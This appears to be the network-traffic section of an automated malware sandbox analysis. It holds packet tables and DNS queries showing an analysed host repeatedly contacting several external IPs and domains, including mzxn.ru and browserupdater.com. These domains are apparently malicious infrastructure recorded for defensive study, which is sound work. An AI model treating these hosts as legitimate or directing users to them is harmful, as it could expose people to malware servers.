                          Aug 6, 2024 14:49:00.837105989 CEST4975580192.168.2.458.151.148.90
                          Aug 6, 2024 14:49:00.837105989 CEST4975580192.168.2.458.151.148.90
                          Aug 6, 2024 14:49:00.841962099 CEST804975558.151.148.90192.168.2.4
                          Aug 6, 2024 14:49:00.842417002 CEST804975558.151.148.90192.168.2.4
                          Aug 6, 2024 14:49:02.391630888 CEST804975558.151.148.90192.168.2.4
                          Aug 6, 2024 14:49:02.392668009 CEST804975558.151.148.90192.168.2.4
                          Aug 6, 2024 14:49:02.392745018 CEST4975580192.168.2.458.151.148.90
                          Aug 6, 2024 14:49:02.394817114 CEST4975580192.168.2.458.151.148.90
                          Aug 6, 2024 14:49:02.399673939 CEST804975558.151.148.90192.168.2.4
                          Aug 6, 2024 14:49:02.409166098 CEST4975680192.168.2.458.151.148.90
                          Aug 6, 2024 14:49:02.414256096 CEST804975658.151.148.90192.168.2.4
                          Aug 6, 2024 14:49:02.414330006 CEST4975680192.168.2.458.151.148.90
                          Aug 6, 2024 14:49:02.414455891 CEST4975680192.168.2.458.151.148.90
                          Aug 6, 2024 14:49:02.414470911 CEST4975680192.168.2.458.151.148.90
                          Aug 6, 2024 14:49:02.419284105 CEST804975658.151.148.90192.168.2.4
                          Aug 6, 2024 14:49:02.419399023 CEST804975658.151.148.90192.168.2.4
                          Aug 6, 2024 14:49:04.205972910 CEST804975658.151.148.90192.168.2.4
                          Aug 6, 2024 14:49:04.205990076 CEST804975658.151.148.90192.168.2.4
                          Aug 6, 2024 14:49:04.206062078 CEST4975680192.168.2.458.151.148.90
                          Aug 6, 2024 14:49:04.206232071 CEST4975680192.168.2.458.151.148.90
                          Aug 6, 2024 14:49:04.206257105 CEST804975658.151.148.90192.168.2.4
                          Aug 6, 2024 14:49:04.206289053 CEST4975680192.168.2.458.151.148.90
                          Aug 6, 2024 14:49:04.209490061 CEST804975658.151.148.90192.168.2.4
                          Aug 6, 2024 14:49:04.209537983 CEST4975680192.168.2.458.151.148.90
                          Aug 6, 2024 14:49:04.216686964 CEST804975658.151.148.90192.168.2.4
                          Aug 6, 2024 14:49:10.121929884 CEST49757443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:10.121978998 CEST44349757188.114.97.3192.168.2.4
                          Aug 6, 2024 14:49:10.122142076 CEST49757443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:10.123054028 CEST49757443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:10.123065948 CEST44349757188.114.97.3192.168.2.4
                          Aug 6, 2024 14:49:10.600972891 CEST44349757188.114.97.3192.168.2.4
                          Aug 6, 2024 14:49:10.601063967 CEST49757443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:10.602366924 CEST49757443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:10.602376938 CEST44349757188.114.97.3192.168.2.4
                          Aug 6, 2024 14:49:10.602576971 CEST44349757188.114.97.3192.168.2.4
                          Aug 6, 2024 14:49:10.643079996 CEST49757443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:10.649642944 CEST49757443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:10.649662018 CEST49757443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:10.649730921 CEST44349757188.114.97.3192.168.2.4
                          Aug 6, 2024 14:49:11.201172113 CEST44349757188.114.97.3192.168.2.4
                          Aug 6, 2024 14:49:11.201241970 CEST44349757188.114.97.3192.168.2.4
                          Aug 6, 2024 14:49:11.201299906 CEST49757443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:11.201478004 CEST49757443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:11.201493025 CEST44349757188.114.97.3192.168.2.4
                          Aug 6, 2024 14:49:17.484611034 CEST49758443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:17.484652042 CEST44349758188.114.97.3192.168.2.4
                          Aug 6, 2024 14:49:17.484747887 CEST49758443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:17.485690117 CEST49758443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:17.485704899 CEST44349758188.114.97.3192.168.2.4
                          Aug 6, 2024 14:49:17.962440968 CEST44349758188.114.97.3192.168.2.4
                          Aug 6, 2024 14:49:17.962593079 CEST49758443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:17.965253115 CEST49758443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:17.965276957 CEST44349758188.114.97.3192.168.2.4
                          Aug 6, 2024 14:49:17.965517044 CEST44349758188.114.97.3192.168.2.4
                          Aug 6, 2024 14:49:18.014029980 CEST49758443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:18.014065981 CEST49758443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:18.014198065 CEST44349758188.114.97.3192.168.2.4
                          Aug 6, 2024 14:49:18.532964945 CEST44349758188.114.97.3192.168.2.4
                          Aug 6, 2024 14:49:18.533027887 CEST44349758188.114.97.3192.168.2.4
                          Aug 6, 2024 14:49:18.533126116 CEST49758443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:18.533240080 CEST49758443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:18.533288956 CEST44349758188.114.97.3192.168.2.4
                          Aug 6, 2024 14:49:18.533318996 CEST49758443192.168.2.4188.114.97.3
                          Aug 6, 2024 14:49:18.533335924 CEST44349758188.114.97.3192.168.2.4
                          Aug 6, 2024 14:50:11.717703104 CEST4975980192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:11.722887039 CEST804975958.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:11.722984076 CEST4975980192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:11.723174095 CEST4975980192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:11.723174095 CEST4975980192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:11.729207993 CEST804975958.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:11.729262114 CEST804975958.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:14.241234064 CEST804975958.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:14.241302013 CEST804975958.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:14.241483927 CEST4975980192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:14.241483927 CEST4975980192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:14.251682997 CEST804975958.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:18.180078983 CEST4976080192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:18.938657999 CEST804976058.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:18.938767910 CEST4976080192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:18.938966990 CEST4976080192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:18.938990116 CEST4976080192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:18.944364071 CEST804976058.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:18.944382906 CEST804976058.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:20.436502934 CEST804976058.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:20.437501907 CEST804976058.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:20.438920021 CEST4976080192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:20.444077969 CEST4976080192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:20.449093103 CEST804976058.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:24.235246897 CEST4976180192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:24.240174055 CEST804976158.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:24.240268946 CEST4976180192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:24.240449905 CEST4976180192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:24.240544081 CEST4976180192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:24.245758057 CEST804976158.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:24.246362925 CEST804976158.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:25.754066944 CEST804976158.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:25.754190922 CEST804976158.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:25.754266977 CEST4976180192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:25.754451036 CEST4976180192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:25.759254932 CEST804976158.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:29.418553114 CEST4976280192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:29.423682928 CEST804976258.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:29.423790932 CEST4976280192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:29.423993111 CEST4976280192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:29.424031019 CEST4976280192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:29.428858042 CEST804976258.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:29.428884029 CEST804976258.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:30.906397104 CEST804976258.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:30.907668114 CEST804976258.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:30.907850981 CEST4976280192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:30.907850981 CEST4976280192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:30.912741899 CEST804976258.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:34.500500917 CEST4976380192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:34.507512093 CEST804976358.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:34.508505106 CEST4976380192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:34.508505106 CEST4976380192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:34.508505106 CEST4976380192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:34.513494968 CEST804976358.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:34.514451027 CEST804976358.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:36.064568996 CEST804976358.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:36.064766884 CEST804976358.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:36.064847946 CEST4976380192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:36.064879894 CEST4976380192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:36.069991112 CEST804976358.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:39.735210896 CEST4976480192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:39.740401983 CEST804976458.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:39.740499973 CEST4976480192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:39.740627050 CEST4976480192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:39.740658998 CEST4976480192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:39.746634007 CEST804976458.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:39.746665001 CEST804976458.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:41.268623114 CEST804976458.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:41.269649029 CEST804976458.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:41.269726038 CEST4976480192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:41.269809008 CEST4976480192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:41.274873018 CEST804976458.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:44.938630104 CEST4976580192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:44.946299076 CEST804976558.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:44.946429968 CEST4976580192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:44.946572065 CEST4976580192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:44.946592093 CEST4976580192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:44.951483011 CEST804976558.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:44.951828957 CEST804976558.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:46.436702013 CEST804976558.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:46.436912060 CEST804976558.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:46.436979055 CEST4976580192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:46.437037945 CEST4976580192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:46.441832066 CEST804976558.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:50.232364893 CEST4976680192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:50.237962008 CEST804976658.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:50.238054991 CEST4976680192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:50.238221884 CEST4976680192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:50.238255978 CEST4976680192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:50.244024038 CEST804976658.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:50.244524002 CEST804976658.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:51.716818094 CEST804976658.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:51.717608929 CEST804976658.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:51.717674017 CEST4976680192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:51.717812061 CEST4976680192.168.2.458.151.148.90
                          Aug 6, 2024 14:50:51.722588062 CEST804976658.151.148.90192.168.2.4
                          Aug 6, 2024 14:50:57.942748070 CEST4976780192.168.2.4190.187.52.42
                          Aug 6, 2024 14:50:57.947973013 CEST8049767190.187.52.42192.168.2.4
                          Aug 6, 2024 14:50:57.948055029 CEST4976780192.168.2.4190.187.52.42
                          Aug 6, 2024 14:50:57.948179007 CEST4976780192.168.2.4190.187.52.42
                          Aug 6, 2024 14:50:57.948189020 CEST4976780192.168.2.4190.187.52.42
                          Aug 6, 2024 14:50:57.953278065 CEST8049767190.187.52.42192.168.2.4
                          Aug 6, 2024 14:50:57.953454971 CEST8049767190.187.52.42192.168.2.4
                          Aug 6, 2024 14:50:59.093554974 CEST8049767190.187.52.42192.168.2.4
                          Aug 6, 2024 14:50:59.094047070 CEST8049767190.187.52.42192.168.2.4
                          Aug 6, 2024 14:50:59.094118118 CEST4976780192.168.2.4190.187.52.42
                          Aug 6, 2024 14:50:59.094204903 CEST4976780192.168.2.4190.187.52.42
                          Aug 6, 2024 14:50:59.099193096 CEST8049767190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:03.077430964 CEST4976880192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:03.083050013 CEST8049768190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:03.083149910 CEST4976880192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:03.083345890 CEST4976880192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:03.083379030 CEST4976880192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:03.088843107 CEST8049768190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:03.089201927 CEST8049768190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:04.254211903 CEST8049768190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:04.254354954 CEST8049768190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:04.254415035 CEST4976880192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:04.254503012 CEST4976880192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:04.259418011 CEST8049768190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:08.412007093 CEST4976980192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:08.417481899 CEST8049769190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:08.417646885 CEST4976980192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:08.417753935 CEST4976980192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:08.417779922 CEST4976980192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:08.422730923 CEST8049769190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:08.423072100 CEST8049769190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:09.566629887 CEST8049769190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:09.566761971 CEST8049769190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:09.566965103 CEST4976980192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:09.569247961 CEST4976980192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:09.574232101 CEST8049769190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:13.654182911 CEST4977080192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:13.660975933 CEST8049770190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:13.661147118 CEST4977080192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:13.661300898 CEST4977080192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:13.661329985 CEST4977080192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:13.666577101 CEST8049770190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:13.667227030 CEST8049770190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:14.828363895 CEST8049770190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:14.828860044 CEST8049770190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:14.829047918 CEST4977080192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:14.829049110 CEST4977080192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:14.834055901 CEST8049770190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:18.699692011 CEST4977180192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:18.704843044 CEST8049771190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:18.704982996 CEST4977180192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:18.705127954 CEST4977180192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:18.705153942 CEST4977180192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:18.710019112 CEST8049771190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:18.710217953 CEST8049771190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:19.866970062 CEST8049771190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:19.867645979 CEST8049771190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:19.867733002 CEST4977180192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:19.867827892 CEST4977180192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:19.872622967 CEST8049771190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:23.495456934 CEST4977280192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:23.500823975 CEST8049772190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:23.500967026 CEST4977280192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:23.501054049 CEST4977280192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:23.504863024 CEST4977280192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:23.506128073 CEST8049772190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:23.512903929 CEST8049772190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:24.925879002 CEST8049772190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:24.926126003 CEST8049772190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:24.926341057 CEST4977280192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:24.926342010 CEST4977280192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:24.932187080 CEST8049772190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:28.608846903 CEST4977380192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:28.614085913 CEST8049773190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:28.614190102 CEST4977380192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:28.614402056 CEST4977380192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:28.614447117 CEST4977380192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:28.624732018 CEST8049773190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:28.625039101 CEST8049773190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:29.790728092 CEST8049773190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:29.791251898 CEST8049773190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:29.791538000 CEST4977380192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:29.791538000 CEST4977380192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:29.797141075 CEST8049773190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:33.441787958 CEST4977480192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:33.447191000 CEST8049774190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:33.447288036 CEST4977480192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:33.447446108 CEST4977480192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:33.447487116 CEST4977480192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:33.452433109 CEST8049774190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:33.452653885 CEST8049774190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:34.617417097 CEST8049774190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:34.618324041 CEST8049774190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:34.618407965 CEST4977480192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:34.618490934 CEST4977480192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:34.623441935 CEST8049774190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:38.913995028 CEST4977580192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:38.919528961 CEST8049775190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:38.919610023 CEST4977580192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:38.919724941 CEST4977580192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:38.919754028 CEST4977580192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:38.924619913 CEST8049775190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:38.925539970 CEST8049775190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:40.130624056 CEST8049775190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:40.131684065 CEST8049775190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:40.131886959 CEST4977580192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:40.131886959 CEST4977580192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:40.136841059 CEST8049775190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:44.313976049 CEST4977680192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:44.319683075 CEST8049776190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:44.319981098 CEST4977680192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:44.320075035 CEST4977680192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:44.320075035 CEST4977680192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:44.325387001 CEST8049776190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:44.325536013 CEST8049776190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:45.563690901 CEST8049776190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:45.563739061 CEST8049776190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:45.563822031 CEST4977680192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:45.563922882 CEST4977680192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:45.568815947 CEST8049776190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:49.211532116 CEST4977780192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:49.217236996 CEST8049777190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:49.217341900 CEST4977780192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:49.217453003 CEST4977780192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:49.217482090 CEST4977780192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:49.222387075 CEST8049777190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:49.222755909 CEST8049777190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:50.452819109 CEST8049777190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:50.452842951 CEST8049777190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:50.453125954 CEST4977780192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:50.454510927 CEST4977780192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:50.459709883 CEST8049777190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:54.150331020 CEST4977880192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:54.155994892 CEST8049778190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:54.156121969 CEST4977880192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:54.156217098 CEST4977880192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:54.156244040 CEST4977880192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:54.161274910 CEST8049778190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:54.161932945 CEST8049778190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:55.336523056 CEST8049778190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:55.337182999 CEST8049778190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:55.337366104 CEST4977880192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:55.337366104 CEST4977880192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:55.342277050 CEST8049778190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:59.419365883 CEST4977980192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:59.424702883 CEST8049779190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:59.424810886 CEST4977980192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:59.424931049 CEST4977980192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:59.424964905 CEST4977980192.168.2.4190.187.52.42
                          Aug 6, 2024 14:51:59.429850101 CEST8049779190.187.52.42192.168.2.4
                          Aug 6, 2024 14:51:59.430457115 CEST8049779190.187.52.42192.168.2.4
                          Aug 6, 2024 14:52:00.583287001 CEST8049779190.187.52.42192.168.2.4
                          Aug 6, 2024 14:52:00.583380938 CEST8049779190.187.52.42192.168.2.4
                          Aug 6, 2024 14:52:00.583524942 CEST4977980192.168.2.4190.187.52.42
                          TimestampSource PortDest PortSource IPDest IP
                          Aug 6, 2024 14:48:23.808614969 CEST6135453192.168.2.41.1.1.1
                          Aug 6, 2024 14:48:24.799757004 CEST6135453192.168.2.41.1.1.1
                          Aug 6, 2024 14:48:25.815249920 CEST6135453192.168.2.41.1.1.1
                          Aug 6, 2024 14:48:26.047180891 CEST53613541.1.1.1192.168.2.4
                          Aug 6, 2024 14:48:26.047480106 CEST53613541.1.1.1192.168.2.4
                          Aug 6, 2024 14:48:26.047781944 CEST53613541.1.1.1192.168.2.4
                          Aug 6, 2024 14:48:50.167984009 CEST5131153192.168.2.41.1.1.1
                          Aug 6, 2024 14:48:50.617371082 CEST53513111.1.1.1192.168.2.4
                          Aug 6, 2024 14:48:57.609970093 CEST6521653192.168.2.41.1.1.1
                          Aug 6, 2024 14:48:57.647706985 CEST53652161.1.1.1192.168.2.4
                          Aug 6, 2024 14:49:10.103430033 CEST5959753192.168.2.41.1.1.1
                          Aug 6, 2024 14:49:10.118927956 CEST53595971.1.1.1192.168.2.4
                          Aug 6, 2024 14:50:55.563322067 CEST5494753192.168.2.41.1.1.1
                          Aug 6, 2024 14:50:56.549593925 CEST5494753192.168.2.41.1.1.1
                          Aug 6, 2024 14:50:57.549750090 CEST5494753192.168.2.41.1.1.1
                          Aug 6, 2024 14:50:57.941947937 CEST53549471.1.1.1192.168.2.4
                          Aug 6, 2024 14:50:57.942003012 CEST53549471.1.1.1192.168.2.4
                          Aug 6, 2024 14:50:57.942032099 CEST53549471.1.1.1192.168.2.4
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Aug 6, 2024 14:48:23.808614969 CEST192.168.2.41.1.1.10xbda5Standard query (0)mzxn.ruA (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:24.799757004 CEST192.168.2.41.1.1.10xbda5Standard query (0)mzxn.ruA (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:25.815249920 CEST192.168.2.41.1.1.10xbda5Standard query (0)mzxn.ruA (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:50.167984009 CEST192.168.2.41.1.1.10xc30eStandard query (0)browserupdater.comA (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:57.609970093 CEST192.168.2.41.1.1.10xe998Standard query (0)mussangroup.comA (IP address)IN (0x0001)false
                          Aug 6, 2024 14:49:10.103430033 CEST192.168.2.41.1.1.10x960dStandard query (0)mundoparachicas.spaceA (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:55.563322067 CEST192.168.2.41.1.1.10x6e40Standard query (0)mzxn.ruA (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:56.549593925 CEST192.168.2.41.1.1.10x6e40Standard query (0)mzxn.ruA (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.549750090 CEST192.168.2.41.1.1.10x6e40Standard query (0)mzxn.ruA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Aug 6, 2024 14:48:26.047180891 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru58.151.148.90A (IP address)IN (0x0001)false
